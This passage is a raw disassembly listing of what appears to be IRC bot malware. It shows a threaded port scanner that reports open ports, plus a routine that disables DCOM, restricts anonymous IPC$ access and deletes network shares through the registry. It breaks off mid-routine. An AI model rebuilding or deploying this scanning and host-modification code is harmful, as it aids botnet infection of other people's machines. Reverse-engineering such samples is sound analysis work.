loc_40E6C2: ; CODE XREF: .text:0040E66F�j
; .text:0040E676�j ...
mov edi, [ebp+7Ch]
push esi
push offset aS_5 ; "[%s]"
push 1Ch
push edi
call sub_412E0D
xor esi, esi
add esp, 10h
cmp dword_42AE60, esi
jle short loc_40E706
loc_40E6E0: ; CODE XREF: .text:0040E704�j
call sub_412D71
push 0Ah
pop ecx
cdq
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_412E0D
add esp, 14h
inc esi
cmp esi, dword_42AE60
jl short loc_40E6E0
loc_40E706: ; CODE XREF: .text:0040E6DE�j
mov eax, edi
pop edi
pop esi
add ebp, 74h
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E70F proc near ; CODE XREF: sub_40E7B0+80�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
call ds:dword_41F004 ; GetTickCount
xor edx, edx
mov ecx, 5265C00h
div ecx
push 0
push offset aMirc_0 ; "mIRC"
mov esi, eax
call dword_4334F8
test esi, esi
jbe short loc_40E75D
test eax, eax
mov eax, offset aM_0 ; "[M]"
jnz short loc_40E746
mov eax, 41FA76h
loc_40E746: ; CODE XREF: sub_40E70F+30�j
push eax
push esi
push offset aDS ; "[%d]%s"
lea eax, [ebp+var_1C]
push 1Ch
push eax
call sub_412E0D
add esp, 14h
jmp short loc_40E777
; ---------------------------------------------------------------------------
loc_40E75D: ; CODE XREF: sub_40E70F+27�j
test eax, eax
mov eax, offset aM_0 ; "[M]"
jnz short loc_40E76B
mov eax, 41FA76h
loc_40E76B: ; CODE XREF: sub_40E70F+55�j
push eax
lea eax, [ebp+var_1C]
push eax
call sub_412BB5
pop ecx
pop ecx
loc_40E777: ; CODE XREF: sub_40E70F+4C�j
lea eax, [ebp+var_1C]
lea edx, [eax+1]
pop esi
loc_40E77E: ; CODE XREF: sub_40E70F+74�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40E77E
sub eax, edx
cmp eax, 2
jbe short loc_40E7AB
push 1Ch
push [ebp+arg_0]
lea eax, [ebp+var_1C]
push eax
call sub_412A80
push 1Ch
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_0]
call sub_412C40
add esp, 18h
loc_40E7AB: ; CODE XREF: sub_40E70F+7B�j
mov eax, [ebp+arg_0]
leave
retn
sub_40E70F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E7B0 proc near ; CODE XREF: sub_40751F+53�p
; sub_40779B+45�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
push edi
xor edx, edx
xor edi, edi
loc_40E7BA: ; CODE XREF: sub_40E7B0+62�j
mov esi, [ebp+arg_C]
test esi, esi
jz short loc_40E7F9
lea eax, dword_42B288[edi]
loc_40E7C7: ; CODE XREF: sub_40E7B0+33�j
mov bl, [esi]
mov cl, bl
cmp bl, [eax]
jnz short loc_40E7E9
test cl, cl
jz short loc_40E7E5
mov bl, [esi+1]
mov cl, bl
cmp bl, [eax+1]
jnz short loc_40E7E9
inc esi
inc esi
inc eax
inc eax
test cl, cl
jnz short loc_40E7C7
loc_40E7E5: ; CODE XREF: sub_40E7B0+21�j
xor eax, eax
jmp short loc_40E7EE
; ---------------------------------------------------------------------------
loc_40E7E9: ; CODE XREF: sub_40E7B0+1D�j
; sub_40E7B0+2B�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40E7EE: ; CODE XREF: sub_40E7B0+37�j
xor ecx, ecx
test eax, eax
setz cl
mov eax, ecx
jmp short loc_40E807
; ---------------------------------------------------------------------------
loc_40E7F9: ; CODE XREF: sub_40E7B0+F�j
mov ecx, dword_42B294[edi]
xor eax, eax
cmp ecx, [ebp+arg_4]
setz al
loc_40E807: ; CODE XREF: sub_40E7B0+47�j
test eax, eax
jnz short loc_40E816
add edi, 14h
inc edx
cmp edi, 64h
jb short loc_40E7BA
jmp short loc_40E824
; ---------------------------------------------------------------------------
loc_40E816: ; CODE XREF: sub_40E7B0+59�j
push [ebp+arg_0]
lea eax, [edx+edx*4]
call off_42B298[eax*4]
pop ecx
loc_40E824: ; CODE XREF: sub_40E7B0+64�j
cmp [ebp+arg_8], 0
pop edi
pop esi
pop ebx
jz short loc_40E838
push [ebp+arg_0]
call sub_40E70F
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40E838: ; CODE XREF: sub_40E7B0+7B�j
mov eax, [ebp+arg_0]
pop ebp
retn
sub_40E7B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_40E83D proc near ; DATA XREF: sub_40E8FF+77�o
var_B8 = dword ptr -0B8h
var_B4 = byte ptr -0B4h
var_34 = dword ptr -34h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 0B8h
mov eax, [ebp+74h+arg_0]
push esi
push edi
mov esi, eax
push 2Ah
pop ecx
lea edi, [ebp+74h+var_B8]
rep movsd
push [ebp+74h+var_34]
xor esi, esi
inc esi
mov [eax+0A4h], esi
xor eax, eax
lea edi, [ebp+74h+var_10]
stosd
stosd
stosd
stosd
mov [ebp+74h+var_10], 2
call dword_4335EC
push 6
mov [ebp+74h+var_E], ax
mov eax, [ebp+74h+var_28]
push esi
push 2
mov [ebp+74h+var_C], eax
call dword_4334A0
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40E8ED
push 10h
lea eax, [ebp+74h+var_10]
push eax
push esi
call dword_433458
mov ecx, [ebp+74h+var_2C]
imul ecx, 234h
cmp eax, 0FFFFFFFFh
mov dword_434344[ecx], esi
jz short loc_40E8ED
push [ebp+74h+var_34]
push [ebp+74h+var_28]
call dword_433520
push eax
push offset aScanIpSPortD_0 ; "[SCAN]: IP: %s Port: %d is open."
mov edi, offset dword_479C18
push edi
call sub_412BB5
push 0
push [ebp+74h+var_20]
lea eax, [ebp+74h+var_B4]
push edi
push eax
push [ebp+74h+var_B8]
call sub_4045DD
push edi
call sub_401C33
add esp, 28h
loc_40E8ED: ; CODE XREF: sub_40E83D+55�j
; sub_40E83D+76�j
push esi
call dword_4335AC
pop edi
xor eax, eax
pop esi
add ebp, 74h
leave
retn 4
sub_40E83D endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame fpd=74h
sub_40E8FF proc near ; DATA XREF: sub_4078FA+25BA�o
var_12C = byte ptr -12Ch
var_AC = byte ptr -0ACh
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 12Ch
push ebx
mov ebx, [ebp+74h+arg_0]
push esi
push edi
push 2Ah
pop ecx
mov esi, ebx
lea edi, [ebp+74h+var_AC]
rep movsd
mov esi, ds:dword_41F000
mov dword ptr [ebx+0A0h], 1
xor edi, edi
loc_40E92C: ; CODE XREF: sub_40E8FF+C1�j
push [ebp+74h+var_28]
push [ebp+74h+var_1C]
call dword_433520
push eax
lea eax, [ebp+74h+var_12C]
push offset aScanScanningIp ; "[SCAN]: Scanning IP: %s, Port: %d."
push eax
call sub_412BB5
push 1FFh
lea eax, [ebp+74h+var_12C]
push eax
mov eax, [ebp+74h+var_20]
imul eax, 234h
add eax, offset dword_434138
push eax
call sub_412C40
add esp, 1Ch
lea eax, [ebp+74h+var_4]
push eax
push edi
lea eax, [ebp+74h+var_AC]
push eax
push offset sub_40E83D
push edi
push edi
call ds:dword_41F00C ; CreateThread
cmp eax, edi
mov [ebp+74h+arg_0], eax
jz short loc_40E995
jmp short loc_40E990
; ---------------------------------------------------------------------------
loc_40E98C: ; CODE XREF: sub_40E8FF+94�j
push 32h
call esi ; Sleep
loc_40E990: ; CODE XREF: sub_40E8FF+8B�j
cmp [ebp+74h+var_8], edi
jz short loc_40E98C
loc_40E995: ; CODE XREF: sub_40E8FF+89�j
push [ebp+74h+arg_0]
call ds:dword_41F034 ; CloseHandle
push dword ptr [ebx+88h]
mov [ebx+0A4h], edi
call esi ; Sleep
push [ebp+74h+var_1C]
call dword_433570
inc eax
push eax
call dword_4335C4
mov [ebp+74h+var_1C], eax
jmp loc_40E92C
sub_40E8FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E9C5 proc near ; CODE XREF: sub_40F005+8�p
; sub_40F023+37�p
var_214 = byte ptr -214h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 214h
push esi
push edi
xor edi, edi
cmp dword_433600, edi
jnz loc_40EAF8
lea eax, [ebp+var_4]
push eax
push 2001Fh
push edi
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
mov esi, 80000002h
push esi
call dword_4335C8
test eax, eax
jnz short loc_40EA51
lea eax, [ebp+var_8+2]
mov word ptr [ebp+var_8+2], 4Eh
lea edx, [eax+1]
loc_40EA09: ; CODE XREF: sub_40E9C5+49�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40EA09
sub eax, edx
push eax
lea eax, [ebp+var_8+2]
push eax
push 1
push edi
push offset aEnabledcom ; "EnableDCOM"
push [ebp+var_4]
call dword_433484
test eax, eax
lea eax, [ebp+var_214]
jz short loc_40EA39
push offset aSecureDisableD ; "[SECURE]: Disable DCOM failed."
jmp short loc_40EA3E
; ---------------------------------------------------------------------------
loc_40EA39: ; CODE XREF: sub_40E9C5+6B�j
push offset aSecureDcomDisa ; "[SECURE]: DCOM disabled."
loc_40EA3E: ; CODE XREF: sub_40E9C5+72�j
push eax
call sub_412BB5
pop ecx
pop ecx
push [ebp+var_4]
call dword_43357C
jmp short loc_40EA64
; ---------------------------------------------------------------------------
loc_40EA51: ; CODE XREF: sub_40E9C5+36�j
lea eax, [ebp+var_214]
push offset aSecureFailed_0 ; "[SECURE]: Failed to open DCOM registry "...
push eax
call sub_412BB5
pop ecx
pop ecx
loc_40EA64: ; CODE XREF: sub_40E9C5+8A�j
cmp [ebp+arg_C], edi
jnz short loc_40EA83
push 1
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
loc_40EA83: ; CODE XREF: sub_40E9C5+A2�j
lea eax, [ebp+var_214]
push eax
call sub_401C33
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push edi
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call dword_4335C8
test eax, eax
jnz short loc_40EAF1
push 4
lea eax, [ebp+var_8]
push eax
push 4
push edi
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_4]
mov [ebp+var_8], 1
call dword_433484
test eax, eax
lea eax, [ebp+var_214]
jz short loc_40EAD9
push offset aSecureFailed_1 ; "[SECURE]: Failed to restrict access to "...
jmp short loc_40EADE
; ---------------------------------------------------------------------------
loc_40EAD9: ; CODE XREF: sub_40E9C5+10B�j
push offset aSecureRestrict ; "[SECURE]: Restricted access to the IPC$"...
loc_40EADE: ; CODE XREF: sub_40E9C5+112�j
push eax
call sub_412BB5
pop ecx
pop ecx
push [ebp+var_4]
call dword_43357C
jmp short loc_40EB0B
; ---------------------------------------------------------------------------
loc_40EAF1: ; CODE XREF: sub_40E9C5+E3�j
push offset aSecureFailed_2 ; "[SECURE]: Failed to open IPC$ Restricti"...
jmp short loc_40EAFD
; ---------------------------------------------------------------------------
loc_40EAF8: ; CODE XREF: sub_40E9C5+13�j
push offset aSecureAdvapi32 ; "[SECURE]: Advapi32.dll couldn't be load"...
loc_40EAFD: ; CODE XREF: sub_40E9C5+131�j
lea eax, [ebp+var_214]
push eax
call sub_412BB5
pop ecx
pop ecx
loc_40EB0B: ; CODE XREF: sub_40E9C5+12A�j
cmp [ebp+arg_C], edi
jnz short loc_40EB2A
push 1
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
loc_40EB2A: ; CODE XREF: sub_40E9C5+149�j
lea eax, [ebp+var_214]
push eax
call sub_401C33
cmp dword_433628, edi
pop ecx
jnz loc_40ECA7
mov [ebp+var_4], edi
mov [ebp+var_14], edi
mov [ebp+var_C], edi
push ebx
loc_40EB4D: ; CODE XREF: sub_40E9C5+2C6�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
push 0FFFFFFFFh
lea eax, [ebp+var_8]
push eax
push 1F6h
push edi
call dword_4335A0
cmp eax, edi
mov [ebp+var_10], eax
jz short loc_40EBEC
cmp eax, 0EAh
jz short loc_40EBEC
xor esi, esi
loc_40EB7B: ; CODE XREF: sub_40E9C5+220�j
push off_42B2F0[esi]
push edi
call sub_406032
pop ecx
pop ecx
push off_42B2F0[esi]
test eax, eax
lea eax, [ebp+var_214]
jnz short loc_40EBA0
push offset aSecureShareSDe ; "[SECURE]: Share '%s' deleted."
jmp short loc_40EBA5
; -------------------------------------